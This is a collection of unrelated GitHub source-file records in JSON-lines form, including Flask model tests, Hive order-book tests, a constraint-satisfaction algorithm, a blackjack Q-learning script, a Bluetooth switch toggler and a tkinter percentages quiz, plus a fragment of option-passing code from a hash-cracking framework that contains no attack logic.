= post_attack)\n\n option = option.lower()\n # attack -> pre atack\n if option == \"wordlist\":\n if self.selected_pre_attack and not (pre_attack or post_attack): # and \\\n #self.options['wordlist'].value is not None:\n self.selected_pre_attack.options['wordlist'].value = self.options['wordlist'].value\n\n # pre atack -> attack\n if option == \"wordlist\":\n if self.selected_pre_attack and pre_attack: # and \\\n #self.selected_pre_attack.options['wordlist'].value:\n self.options['wordlist'].value = self.selected_pre_attack.options['wordlist'].value\n","repo_name":"abjoschevaro/ama-framework","sub_path":"ama/core/modules/attack/hashes/fullattacks/cuppRefine_johnWordlist__.py","file_name":"cuppRefine_johnWordlist__.py","file_ext":"py","file_size_in_byte":3300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"44039560741","text":"\"\"\"User model tests.\"\"\"\n\n# run these tests like:\n#\n# python -m unittest test_user_model.py\n\n\nimport os\nfrom unittest import TestCase\n# from sqlalchemy import exc\n\nfrom models import db, User, Message, Follows, Likes\n\n# BEFORE we import our app, let's set an environmental variable\n# to use a different database for tests (we need to do this\n# 
before we import our app, since that will have already\n# connected to the database)\n\nos.environ['DATABASE_URL'] = \"postgresql:///warbler-test\"\n\n\n# Now we can import app\n\nfrom app import app\n\n# Create our tables (we do this here, so we only create the tables\n# once for all tests --- in each test, we'll delete the data\n# and create fresh new clean test data)\n\ndb.create_all()\n\n\nclass MessageModelTestCase(TestCase):\n    \"\"\"Tests for the Message model.\"\"\"\n\n    def setUp(self):\n        \"\"\"Create test client, add sample data.\"\"\"\n\n        db.drop_all()\n        db.create_all()\n\n        u1 = User.signup(\"testuser1\", \"test1@test.com\", \"HASHED_PASSWORD\", None)\n        u1id = 1\n        u1.id = u1id\n\n        m1 = Message(text='hi, this is a test', user_id=u1id)\n        m1id = 1\n        m1.id = m1id\n\n        db.session.add(m1)\n        db.session.commit()\n\n        m1 = Message.query.get(m1id)\n        u1 = User.query.get(u1id)\n\n        self.m1 = m1\n        self.m1id = m1id\n        self.u1 = u1\n        self.u1id = u1id\n\n        self.client = app.test_client()\n\n    def tearDown(self):\n        res = super().tearDown()\n        db.session.rollback()\n        return res\n\n    def test_message_model(self):\n        \"\"\"Does basic model work?\"\"\"\n\n        m = Message(\n            text=\"Does basic model work?\",\n            user_id=1\n        )\n        m.id = 2\n\n        db.session.add(m)\n        db.session.commit()\n\n        self.assertIsNotNone(m)\n        self.assertEqual(m.user.id, 1)\n        self.assertEqual(len(self.u1.messages), 2)\n        self.assertEqual(self.u1.messages[1].text, \"Does basic model work?\")\n\n\n    def test_message_likes(self):\n        \"\"\"Does liking a message work?\"\"\"\n\n        u2 = User.signup(\"like_user\", \"like@email.com\", \"password\", None)\n        u2id = 2\n        u2.id = u2id\n        db.session.add_all([u2])\n        db.session.commit()\n\n        u2.likes.append(self.m1)\n\n        db.session.commit()\n\n        l = Likes.query.filter(Likes.user_id == u2id).all()\n        self.assertEqual(len(l), 1)\n        self.assertEqual(l[0].message_id, self.m1.id)\n","repo_name":"jimmy5227/26-Twitter-Clone","sub_path":"test_message_model.py","file_name":"test_message_model.py","file_ext":"py","file_size_in_byte":2408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"40561503725","text":"import pytest\n\nimport test_tools as tt\nfrom hive_local_tools import run_for\n\n@pytest.mark.parametrize(\n    'ask_hbd_amount, ask_hive_amount, bid_hbd_amount, bid_hive_amount', (\n        (50, 300, 30, 200),\n        (25, 250, 20, 300)\n    )\n)\n@run_for('testnet')\ndef test_get_order_book_with_different_values(node, ask_hbd_amount, ask_hive_amount, bid_hbd_amount, bid_hive_amount):\n    wallet = tt.Wallet(attach_to=node)\n    wallet.create_account('alice', hives=tt.Asset.Test(500), vests=tt.Asset.Test(100))\n\n    wallet.api.create_order('alice', 0, tt.Asset.Test(ask_hive_amount), tt.Asset.Tbd(ask_hbd_amount), False, 3600)\n    wallet.api.create_order('initminer', 1, tt.Asset.Tbd(bid_hbd_amount), tt.Asset.Test(bid_hive_amount), False, 3600)\n\n    response = node.api.market_history.get_order_book()\n    assert len(response['asks']) == 1\n    assert len(response['bids']) == 1\n\n    assert response['asks'][0]['order_price']['base'] == tt.Asset.Test(ask_hive_amount)\n    assert response['asks'][0]['order_price']['quote'] == tt.Asset.Tbd(ask_hbd_amount)\n    assert float(response['asks'][0]['real_price']) == ask_hbd_amount/ask_hive_amount\n\n    assert response['bids'][0]['order_price']['base'] == tt.Asset.Tbd(bid_hbd_amount)\n    assert response['bids'][0]['order_price']['quote'] == tt.Asset.Test(bid_hive_amount)\n    assert float(response['bids'][0]['real_price']) == bid_hbd_amount/bid_hive_amount\n\n\n@run_for('testnet')\ndef 
test_get_order_book_after_successful_transaction_finishing_all_orders(node):\n    wallet = tt.Wallet(attach_to=node)\n    wallet.create_account('alice', hives=tt.Asset.Test(500), vests=tt.Asset.Test(100))\n\n    wallet.api.create_order('alice', 0, tt.Asset.Test(300), tt.Asset.Tbd(50), False, 3600)\n    wallet.api.create_order('initminer', 1, tt.Asset.Tbd(50), tt.Asset.Test(300), False, 3600)\n\n    response = node.api.market_history.get_order_book()\n    assert len(response['bids']) == 0\n    assert len(response['asks']) == 0\n\n\n@run_for('testnet')\ndef test_exceed_limit_parameter(node):\n    with pytest.raises(tt.exceptions.CommunicationError):\n        node.api.market_history.get_order_book(limit=501)\n\n\n@pytest.mark.parametrize(\n    'limit', (1,2)\n)\n@run_for('testnet')\ndef test_limit(node, limit):\n    wallet = tt.Wallet(attach_to=node)\n    wallet.create_account('alice', hives=tt.Asset.Test(600), vests=tt.Asset.Test(300))\n\n    wallet.api.create_order('alice', 0, tt.Asset.Test(100), tt.Asset.Tbd(100), False, 3600)\n    wallet.api.create_order('initminer', 0, tt.Asset.Tbd(30), tt.Asset.Test(100), False, 3600)\n\n    wallet.api.create_order('alice', 1, tt.Asset.Test(200), tt.Asset.Tbd(200), False, 3600)\n    wallet.api.create_order('initminer', 1, tt.Asset.Tbd(40), tt.Asset.Test(200), False, 3600)\n    if limit == 2:\n        wallet.api.create_order('alice', 2, tt.Asset.Test(300), tt.Asset.Tbd(300), False, 3600)\n        wallet.api.create_order('initminer', 2, tt.Asset.Tbd(50), tt.Asset.Test(300), False, 3600)\n    response = node.api.market_history.get_order_book(limit=limit)\n    assert len(response['bids']) == limit\n    assert len(response['asks']) == limit\n","repo_name":"openhive-network/hive","sub_path":"tests/functional/python_tests/api_tests/market_history_api_tests/test_get_order_book.py","file_name":"test_get_order_book.py","file_ext":"py","file_size_in_byte":3086,"program_lang":"python","lang":"en","doc_type":"code","stars":317,"dataset":"github-code","pt":"92"} +{"seq_id":"25376712045","text":"__Filename__ = 'pathConsistency.py'\n\n# For PC (path consistency), you can simplify the problem\n# by assuming that, for this project's use case, there will be\n# at most 2 values per domain.\n# Since this is very specific, you can take advantage of it to\n# strengthen the efficiency of the implemented algorithm,\n# unlike the general case where the domain size is arbitrary.\n\nfrom genererJeuDeDonnees import *\nimport time\nimport numpy as np\n\n\ndef withoutSupportPC(i, j, k, a, b, jeuDD):\n    \"\"\"If there is a support c of the pair (a, b) in the domain of\n    the k-th variable, return False;\n    otherwise, return True\"\"\"\n\n    R_ik = jeuDD[i, k]\n    cardinald_k = R_ik.shape[1]\n    assert(cardinald_k <= 2)\n    c = 0 # !!! should use the actual domain of Xk\n\n    if (not(jeuDD[i, k, a, c] == 1 and jeuDD[j, k, b, c] == 1)) and cardinald_k == 2:\n        c = 1\n\n    return not(jeuDD[i, k, a, c] == 1 and jeuDD[j, k, b, c] == 1)\n\n\ndef initializationPC(jeuDD):\n    listPC = []\n    nbVar = jeuDD.shape[0]\n    listeDeNone = [None] * nbVar\n    # statusPC = [copy([copy(listeDeNone) for k in range(2)]) for i in range(nbVar)]\n    # build independent sublists: [[[False]*nbVar]*2]*nbVar would alias the same inner list\n    statusPC = [[[False] * nbVar for _ in range(2)] for _ in range(nbVar)]\n    # !!! the range of k is to be revisited\n\n    for i in range(nbVar): # our variables are indexed from 0\n        for j in range(nbVar):\n            if i != j:\n                domaine_i = jeuDD[i,j].shape[0]\n                for a in range(domaine_i):\n                    statusPC[i][a][j] = False\n\n    for i in range(nbVar):\n        for j in range(i + 1, nbVar):\n            for k in range(nbVar):\n                if k != i and k != j:\n                    relationContrainte = jeuDD[i, j]\n                    domaine_a = 
relationContrainte.shape[0]\n                    domaine_b = relationContrainte.shape[1]\n                    for a in range(domaine_a):\n                        for b in range(domaine_b):\n                            if jeuDD[i, j, a, b] == 1: # !!! to be verified\n\n                                if withoutSupportPC(i,j,k,a,b, jeuDD):\n                                    jeuDD[i, j, a, b] = 0\n                                    jeuDD[j, i, b, a] = 0\n\n                                    if not(statusPC[i][a][j]): # !!! to be verified\n                                        listPC.append((i, a, j))\n                                        statusPC[i][a][j] = True\n\n                                    if not(statusPC[j][b][i]):\n                                        listPC.append((j, b, i))\n                                        statusPC[j][b][i] = True\n    return (listPC, statusPC)\n\n\ndef propagatePC(i, k, a, jeuDD, listPC, statusPC):\n    assert(isinstance(i, int))\n    assert (isinstance(k, int))\n    #assert(isinstance(a, float)) # !!! to be discussed\n\n    nbVar = jeuDD.shape[0]\n    relationContrainte = jeuDD[i, k]\n    domaine_b = relationContrainte.shape[1]\n\n    for j in range(nbVar):\n        if j != i and j != k:\n            for b in range(domaine_b):\n                if jeuDD[i, j, a, b] == 1:\n                    if withoutSupportPC(i, j, k, a, b, jeuDD):\n                        jeuDD[i, j, a, b] = 0\n                        jeuDD[j, i, b, a] = 0\n\n                        if not(statusPC[i][a][j]):\n                            listPC.append((i, a, j))\n                            statusPC[i][a][j] = True\n\n                        if not(statusPC[j][b][i]):\n                            listPC.append((j, b, i))\n                            statusPC[j][b][i] = True\n\n\ndef algorithmPC8(jeuDD):\n    init = initializationPC(jeuDD)\n    listPC = init[0]\n    statusPC = init[1]\n\n    while len(listPC) > 0:\n        threeTuple = listPC[0]\n        listPC.remove(threeTuple)\n\n        i = threeTuple[0]\n        a = threeTuple[1]\n        k = threeTuple[2]\n\n        statusPC[i][a][k] = False\n        propagatePC(i,k,a, jeuDD, listPC, statusPC)\n\n\n\n###########################################################################################\n# Example applications\n\n## Example 1\n#jeu = genererJeuDeDonnees(3,2,2,0.5)\n#print(jeu)\n# print(algorithmPC8(jeu))\n\n## Example 2\n#R00 = [[0,0], [0,0]]\n#R01 = [[1,0],[0,1]]\n#R02 = [[0, 1], [1,0]]\n#R10 = [[1,0],[0,1]]\n#R12 = [[1,0], [1,1]]\n#R20 = [[0, 1], [1, 0]]\n#R21 = [[1,1],[0,1]]\n#jeuExCours = np.array([[R00, R01, R02], [R10, R00, R12], [R20, R21, R00]])\n#print(\"original data set:\\n\",jeuExCours)\n\n#debut = time.time()\n#algorithmPC8(jeuExCours)\n#fin = time.time()\n\n#print(\"\\ndata set after filtering:\\n\",jeuExCours)\n\n\n#print(\"Execution time: \",fin-debut)\n","repo_name":"LiseIL/ConstraintSatisfaction","sub_path":"pathConsistency.py","file_name":"pathConsistency.py","file_ext":"py","file_size_in_byte":4515,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"36803990581","text":"import logging\nfrom pathlib import Path\n\nimport hydra\nfrom hydra.core.hydra_config import HydraConfig\nimport matplotlib.pyplot as plt\nfrom omegaconf import DictConfig\n\nfrom src.blackjack import BlackjackLearn, Reward\nfrom src.qlearning import BlackjackQTable\n\n\n@hydra.main(version_base=None, config_path='conf', config_name='blackjack')\ndef main(cfg: DictConfig) -> None:\n    logger = logging.getLogger('main')\n\n    outdir = Path(HydraConfig.get().runtime.output_dir)\n\n    qtable = BlackjackQTable(gamma=0.99, alpha=0.1, shape=(32, 12, 2, 2)).set(init='runif')\n    learner = BlackjackLearn(\n        max_iter=8,\n        # policy=lambda x: Action.mapper(eps_greedy(values=x, eps=1E-2, nactions=len(Action))),\n        qtable=qtable, rewardspec=Reward(**cfg.rewardspec)\n    )\n\n    with plt.ion():\n        plt.figure(figsize=(10, 10))\n        plt.title(\"Q-Table\")\n        rewards_episode = list()\n        for i in range(cfg.n_episodes + 1):\n            reward = learner.run_episode()\n            rewards_episode.append(reward)\n            logger.info(f'episode {i} : episode reward {reward}')\n\n            if i % 50 == 0:\n                qtable.plot(action=\"hit\")\n\n    with open(outdir / f'episodes_{cfg.n_episodes}__rewards.csv', 'w') as 
f:\n f.writelines([f'{elem}\\n' for elem in rewards_episode])\n\n qtable.dump(path=outdir / f'episodes_{cfg.n_episodes}__BlackjackQTable.pickle')\n # qtable.plot(action=\"hit\", savefig_path=outdir / f'episodes_{cfg.n_episodes}__BlackjackQTable.png')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"vmgustavo/202302-UFMG-RL","sub_path":"tp1/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"38463847185","text":"import sys\nfrom itertools import permutations\n\nn,m,k = map(int, sys.stdin.readline().split())\nw = list(map(int, sys.stdin.readline().split()))\ncnt = 0\nans = []\narr = list(permutations(w,n))\nfor x in arr:\n tot = 0\n cnt = 0\n for i in range(k):\n basket = 0\n while True:\n basket += x[cnt]\n cnt = (cnt+1)%n\n if basket + x[cnt] > m:\n break\n tot += basket\n ans.append(tot)\nprint(min(ans))","repo_name":"gunsookim/std_py","sub_path":"std_numpy/softeer_택배마스터광우.py","file_name":"softeer_택배마스터광우.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"15157864726","text":"import asyncio\r\nimport platform\r\n\r\nfrom bleak import BleakClient, BleakScanner\r\n\r\n\r\n\r\naddress = \"F2:CD:ED:18:5F:93\"\r\n\r\nSwitchService_UUID = \"a22b0090-ebdd-49ac-b2e7-40eb55f5d0ab\"\r\nSwitchService_hndl = 45\r\n\r\nOFF = b'\\x00'\r\nON = b'\\x01'\r\n\r\n\r\nimport platform\r\nimport asyncio\r\nimport logging\r\n\r\nfrom bleak import BleakClient\r\n\r\n\r\nasync def run(address, debug=False):\r\n\r\n async with BleakClient(address) as client:\r\n x = await client.is_connected()\r\n\r\n if bytes(await client.read_gatt_char(SwitchService_UUID)) == OFF:\r\n await client.write_gatt_char(SwitchService_UUID, ON)\r\n print(\"ON\")\r\n else:\r\n await client.write_gatt_char(SwitchService_UUID, OFF)\r\n print(\"OFF\")\r\n\r\n\r\nglobal loop\r\nloop = asyncio.get_event_loop()\r\n\r\ndef SWITCH():\r\n global loop\r\n\r\n \r\n while 1:\r\n try:\r\n loop.run_until_complete(run(address))\r\n break\r\n except:\r\n pass\r\n return\r\n\r\n\r\n\r\nimport keyboard as kb\r\n\r\n\r\nkb.add_hotkey(\"ctrl+`\", SWITCH, args= () )\r\nkb.wait(\"ctrl+esc\")\r\n","repo_name":"r1997mysm/switchmate-windows","sub_path":"Main_BleakVersion.py","file_name":"Main_BleakVersion.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"21710083164","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.conf import settings\nfrom django.db import models, migrations\n\nimport emr.models\n\n\nclass Migration(migrations.Migration):\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('emr', '0048_observationcomponent_created_on'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='ProblemOrder',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('order', emr.models.ListField(null=True, blank=True)),\n ('patient',\n models.ForeignKey(related_name='patient_problem_order', blank=True, to=settings.AUTH_USER_MODEL,\n null=True)),\n ('user', models.ForeignKey(related_name='user_problem_order', blank=True, to=settings.AUTH_USER_MODEL,\n null=True)),\n ],\n ),\n migrations.AlterModelOptions(\n name='observationcomponent',\n options={'ordering': ['created_on']},\n ),\n 
]\n","repo_name":"smallbrainrecords/foundation","sub_path":"apps/emr/migrations/0049_auto_20160428_2117.py","file_name":"0049_auto_20160428_2117.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"92"} +{"seq_id":"73733772781","text":"import SimpleITK as sitk\nimport sys\n\nfile_name = sys.argv[1]\noutput_name = sys.argv[2]\nimage=sitk.ReadImage(file_name)\ninputImage = sitk.Cast(image, sitk.sitkFloat32)\ncorrector = sitk.N4BiasFieldCorrectionImageFilter()\noutputImage = corrector.Execute(inputImage)\noutputImage = sitk.Cast(outputImage,sitk.sitkUInt16)\nsitk.WriteImage(outputImage, output_name)","repo_name":"zhangsilu17/cb_norm_damage","sub_path":"N4.py","file_name":"N4.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"9363768732","text":"import tkinter as tk #imports tkinter package\r\nimport random #imports random package \r\n\r\nQuestions = [\r\n \"25% of 76\", #MPC\r\n \"18% of 200\", #MPC\r\n \"38% of 6200\", #MPC\r\n \"33.33% of $1200\", #MPC\r\n \"1.25% of $3275\", #MPC\r\n \"75% of $490\", #MPC\r\n \"15% of $1.60\", #MPC\r\n \"8% of $2\", #MPC\r\n \"66.66% of 930g\", #MPC\r\n \"15% of 180\", #MPC\r\n \"is 118% of 450 = 531\", #TORF\r\n \"is 115% of $40 = $50\", #TORF\r\n \"is 200% of 450 = 900 \", #TORF\r\n \"is 108% of $13.50 = $16.58\", #TORF\r\n \"is 72/480 in % = 15% \", #TORF\r\n \"is 13000 - 15% = 11050\", #TORF\r\n \"is 425 - 4% = 400\", #TORF\r\n \"is 450 - 85% = 65.5\", #TORF\r\n \"is 24/20 in % = 120% \", #TORF\r\n \"is 13000/10400 in % = 130%\" #TORF\r\n]\r\nButtonsText = [\r\n [\r\n \"18\", \"19\", \"25\" #19\r\n ],\r\n [\r\n \"36\", \"130\", \"30\" #36\r\n ],\r\n [\r\n \"4329\", \"2300\",\"2356\" #2356\r\n ],\r\n [\r\n \"$380\", \"$500\",\"$400\" #$400\r\n ],\r\n [\r\n \"$41\", \"$40.94\", \"$40\" #$40.94\r\n ],\r\n [\r\n \"$367.50\", \"$350\", \"$400\" #367.50\r\n ],\r\n [\r\n \"24 cents\", \"50 cents\", \"$24\" #24 cents\r\n ],\r\n [\r\n \"20 cents\", \"10\", \"16 cents\" #16 cents\r\n ],\r\n [\r\n \"550g\", \"700g\", \"620g\" #620g\r\n ],\r\n [\r\n \"30\", \"27\", \"50\" #27\r\n ],\r\n [\r\n \"True\", \"False\" #True\r\n ],\r\n [\r\n \"True\", \"False\" #false\r\n ],\r\n [\r\n \"True\", \"False\" #True\r\n ],\r\n [\r\n \"True\", \"False\" #False\r\n ],\r\n [\r\n \"True\", \"False\" #True\r\n ],\r\n [\r\n \"True\", \"False\" #True\r\n ],\r\n [\r\n \"True\", \"False\" #False\r\n ],\r\n [\r\n \"True\", \"False\" #False\r\n ],\r\n [\r\n \"True\", \"False\" #True\r\n ],\r\n [\r\n \"True\", \"False\" #False\r\n ],\r\n]\r\n\r\nAnswers = [\r\n \"b\",\r\n \"a\",\r\n \"a\",\r\n \"c\",\r\n \"b\",\r\n \"a\",\r\n \"a\",\r\n \"c\",\r\n \"c\",\r\n \"b\",\r\n \"true\",\r\n \"false\",\r\n \"true\",\r\n \"false\",\r\n \"true\",\r\n \"true\",\r\n \"false\",\r\n \"false\",\r\n \"true\",\r\n \"false\"\r\n]\r\n\r\n\r\nShuffle1 = list(zip(Questions, Answers, ButtonsText)) #Creates a variable containing all three lists\r\nrandom.shuffle(Shuffle1) #Shuffles the variable with the lists \r\nQuestions, Answers, ButtonsText = zip(*Shuffle1) #redifines the lists \r\n\r\nCorrect = 0 #Declares Correct Variable to be global \r\nskips = 0 #Declares Skips Variable to be global \r\ni = 1 #Declares i Variable to be global \r\n\r\n\r\nclass StartScreen(): #Declares Questions class \r\n def __init__(self): #Initialises Output (First function to always run)\r\n global Questions #Calls Questions\r\n global Answers 
#Calls Answers\r\n global ButtonsText #Calls ButtonsText \r\n global i #Calls i\r\n global Correct #Calls Correct\r\n global skips #Calls skips\r\n Correct = 0 #defines Correct\r\n skips = 0 #defines skips\r\n i = 1 #defines i\r\n ButtonPressed = False #defines ButtonPressed\r\n\r\n self.root = tk.Tk() #initialises window \r\n self.root.geometry('800x500') #sets window size\r\n self.root.configure(bg='#cfe2f3') #sets window colour\r\n self.root.title(\"Percentages Math Quiz\") #sets window name\r\n Title = tk.Label(self.root, text=\"PERCENTAGES MATH QUIZ\", bg=\"#cceae3\", font=\"Arial 18\",width=28,height=3 ,borderwidth=1, relief=\"solid\").place(x=225, y=80) #initialises Title text\r\n Quit = tk.Button(self.root,\r\n text = 'QUIT', borderwidth=1, relief=\"solid\", bg=\"#cceae3\", width=15, height=2, font=\"Arial 14\",\r\n command = lambda : quit()).place(x=610, y=425) #Initialises quit button\r\n Start = tk.Button(self.root,\r\n text = \"START\", borderwidth=1, relief=\"solid\", bg=\"#cceae3\", width=20, height=3, font=\"Arial 14\",\r\n command = lambda : self.Starts()).place(x=320, y=200) #Initialises start button\r\n InstTitle = tk.Label(self.root, text=\"INSTRUCTIONS\", bg=\"#cceae3\", font=\"Arial 14\",width=15,height=2 ,borderwidth=1, relief=\"solid\").place(x=10, y=340) #prints Instructions title\r\n Inst = tk.Label(self.root, text=\"This will be a 10 question quiz made\\nup of true/false and multiple choice\\nquestions. You will be given a NCEA grade.\\nYou can only skip 3 times\", bg=\"#cceae3\", font=\"Arial 12\",width=35,height=5,borderwidth=1, relief=\"solid\").place(x=10, y=390) #prints Instructions\r\n self.root.mainloop() #loops window\r\n\r\n def Starts(self): #start button function\r\n self.root.destroy() #destroys window\r\n second = Question() #goes to questions class\r\n\r\n\r\nclass Question(): #start of questions class\r\n\r\n def __init__(self): #initialiser function\r\n global Correct #calls Correct \r\n global skips #calls skips\r\n global i #calls i\r\n global ButtonPressed #calls ButtonPressed\r\n while i < 11 + skips: #start of question loop\r\n if len(ButtonsText[i]) == 3: #checks if multiple choice question\r\n ButtonPressed = False #resets buttons\r\n self.Setup3btn(Questions[i], ButtonsText[i][0], ButtonsText[i][1], ButtonsText[i][2], Answers[i], i) #calls setup for multiple choice questions\r\n elif len(ButtonsText[i]) == 2: #checks if true or false question\r\n ButtonPressed = False #resets buttons\r\n self.Setup2btn(Questions[i], ButtonsText[i][0], ButtonsText[i][1], Answers[i], i) #calls setup for true or false questions\r\n else: #error handling\r\n quit() #quits if encounters an error\r\n third = FinalScreen() #goes to results screen class\r\n\r\n\r\n def Setup3btn(self, Question, ButtonOne, ButtonTwo, ButtonThree, Answer, LCV): #Start of multiple choice screen \r\n global skips #Calls skips\r\n self.root = tk.Tk() #initialises window\r\n self.root.geometry('800x500') #sets window size\r\n self.root.configure(bg='#cfe2f3') #sets background colour\r\n self.root.title(\"Percentages Math Quiz\") #sets window title \r\n QuestNum = tk.Label(self.root, text=\"Question \" + str(LCV - skips) + \"/10\", bg=\"#cceae3\", font=\"Arial 14\", width=15,\r\n height=2, borderwidth=1, relief=\"solid\").place(x=5, y=5) #prints which question the user is on\r\n Quest = tk.Label(self.root, text=Question, bg=\"#cceae3\", font=\"Arial 18\", width=28, height=3, borderwidth=1,\r\n relief=\"solid\").place(x=210, y=150) #prints question\r\n\r\n ButtonA = 
tk.Button(self.root,\r\n                            text=str(ButtonOne), bg=\"#cceae3\", font=\"Arial 18\", borderwidth=1, relief=\"solid\",\r\n                            width=6, height=1,\r\n                            command=lambda: self.Buttons(Answer, \"a\")).place(x=260, y=260) #initialises Button a\r\n\r\n        ButtonB = tk.Button(self.root,\r\n                            text=str(ButtonTwo), bg=\"#cceae3\", font=\"Arial 18\", borderwidth=1, relief=\"solid\",\r\n                            width=6, height=1,\r\n                            command=lambda: self.Buttons(Answer, \"b\")).place(x=360, y=260) #initialises button b \r\n\r\n        ButtonC = tk.Button(self.root,\r\n                            text=str(ButtonThree), bg=\"#cceae3\", font=\"Arial 18\", borderwidth=1, relief=\"solid\",\r\n                            width=6, height=1,\r\n                            command=lambda: self.Buttons(Answer, \"c\")).place(x=460, y=260) #initialises button c\r\n        SkipButton = tk.Button(self.root,\r\n                               text=\"Skip Question\", bg=\"#cceae3\", font=\"Arial 16\", borderwidth=1, relief=\"solid\",\r\n                               width=12, height=1,\r\n                               command=lambda: self.Skip()).place(x=640, y=450) #initialises skip button\r\n        if ButtonPressed == True: #checks if an option has been selected\r\n            return #returns to loop\r\n        else: #checks if no option has been selected\r\n            self.root.mainloop() #loops window again\r\n            return #returns to loop\r\n\r\n\r\n\r\n    def Setup2btn(self, Question, Button1, Button2, Answer, LCV): #start of true or false window \r\n        global skips #calls skips\r\n        self.root = tk.Tk() #initialises window\r\n        self.root.geometry('800x500') #sets window size\r\n        self.root.configure(bg='#cfe2f3') #sets background colour\r\n        self.root.title(\"Percentages Math Quiz\") #sets window title\r\n        QuestNum = tk.Label(self.root, text=\"Question \" + str(LCV - skips) + \"/10\", bg=\"#cceae3\", font=\"Arial 14\", width=15,\r\n                            height=2, borderwidth=1, relief=\"solid\").place(x=5, y=5) #prints question number\r\n        Quest = tk.Label(self.root, text=Question, bg=\"#cceae3\", font=\"Arial 18\", width=28, height=3, borderwidth=1,\r\n                         relief=\"solid\").place(x=210, y=150) #prints question\r\n\r\n        ButtonA = tk.Button(self.root,\r\n                            text=str(Button1), bg=\"#cceae3\", font=\"Arial 18\", borderwidth=1, relief=\"solid\",\r\n                            width=6, height=1,\r\n                            command=lambda: self.Buttons(Answer, \"true\")).place(x=320, y=260) #initialises button a\r\n\r\n        ButtonB = tk.Button(self.root,\r\n                            text=str(Button2), bg=\"#cceae3\", font=\"Arial 18\", borderwidth=1, relief=\"solid\",\r\n                            width=6, height=1,\r\n                            command=lambda: self.Buttons(Answer, \"false\")).place(x=420, y=260) #initialises button b \r\n\r\n        SkipButton = tk.Button(self.root,\r\n                               text=\"Skip Question\", bg=\"#cceae3\", font=\"Arial 16\", borderwidth=1, relief=\"solid\",\r\n                               width=12, height=1,\r\n                               command=lambda: self.Skip()).place(x=640, y=450) #initialises skip button\r\n        if ButtonPressed == True: #checks if a button has been pressed\r\n            return #returns to loop\r\n        else: #checks if a button hasn't been pressed\r\n            self.root.mainloop() #loops window\r\n            return #returns to loop\r\n\r\n\r\n\r\n    def Buttons(self, Answer, ButtonTypes): #button functions\r\n        global ButtonPressed #calls ButtonPressed\r\n        if Answer == ButtonTypes: #checks if correct answer has been selected\r\n            ButtonPressed = True #changes the button pressed variable\r\n            global Correct #calls Correct\r\n            global i #calls i \r\n            Correct = Correct + 1 #iterates Correct\r\n            i = i + 1 #iterates i \r\n        elif Answer != ButtonTypes: #checks if answer was incorrect\r\n            i = i + 1 #iterates i\r\n            ButtonPressed = True #changes the button pressed variable\r\n        self.root.destroy() #destroys the window\r\n        second = Question() #Goes back to question class\r\n        \r\n\r\n\r\n    def Skip(self): #skip 
button function\r\n        global ButtonPressed #calls ButtonPressed \r\n        ButtonPressed = True #sets the button pressed to true\r\n        global skips #calls skips\r\n        global i #calls i\r\n        if skips < 3: #checks if user is able to skip\r\n            skips = skips + 1 #iterates skips\r\n            i = i + 1 #iterates i\r\n            self.root.destroy() #destroys window\r\n            second = Question() #goes to Question class\r\n        else: #checks if user has gone over their skip limit\r\n            ButtonPressed = False #resets button pressed\r\n            return #returns to question function\r\n        \r\nclass FinalScreen(): #Declares Results class\r\n    def __init__(self): #initialises window\r\n\r\n        global Correct #calls Correct\r\n        percents = Correct/10 #calculates percentage of correct answers\r\n        #marking schedule and defines the grade\r\n        if percents < 0.5: \r\n            Grade = \"N/A\"\r\n        elif percents > 0.49 and percents < 0.7:\r\n            Grade = \"A\"\r\n        elif percents > 0.69 and percents < 0.9:\r\n            Grade = \"M\"\r\n        elif percents > 0.89 and percents < 1.01:\r\n            Grade = \"E\"\r\n        else: #error handling\r\n            quit() #quits code\r\n        self.root = tk.Tk() #initialises window\r\n        self.root.geometry('800x500') #sets window size\r\n        self.root.configure(bg='#cfe2f3') #Sets background colour\r\n        self.root.title(\"Percentages Math Quiz\") #sets window title \r\n\r\n        Title = tk.Label(self.root, text=\"Results\", bg=\"#cceae3\", font=\"Arial 18\", width=15,\r\n                         height=2, borderwidth=1, relief=\"solid\").place(x=330, y=120) #prints title\r\n        Result = tk.Label(self.root, text=Grade + \"\\n\" + \"You Got: \" + str(Correct) + \"/10\", bg=\"#cceae3\", font=\"Arial 20\",\r\n                          width=20,\r\n                          height=5, borderwidth=1, relief=\"solid\").place(x=270, y=200) #prints the results \r\n\r\n        TryAgn = tk.Button(self.root, text=\"TRY AGAIN\", bg=\"#cceae3\", font=\"Arial 16\", borderwidth=1, relief=\"solid\",\r\n                           width=12, height=1,\r\n                           command=lambda: self.tryAgain()).place(x=640, y=450) #initialises try again button\r\n\r\n        QuitButton = tk.Button(self.root, text=\"QUIT\", bg=\"#cceae3\", font=\"Arial 16\", borderwidth=1, relief=\"solid\",\r\n                               width=12, height=1, command=lambda: quit()).place(x=10, y=450) #initialises quit button\r\n\r\n        self.root.mainloop() #loops window\r\n\r\n    def tryAgain(self): #function for try again button\r\n        self.root.destroy() #destroys window\r\n        StartScreen() #goes back to the start screen\r\n        \r\napp = StartScreen() #sets starting window\r\n","repo_name":"zachpickles/13-PRG-Project-","sub_path":"Math Quiz.py","file_name":"Math Quiz.py","file_ext":"py","file_size_in_byte":14061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} 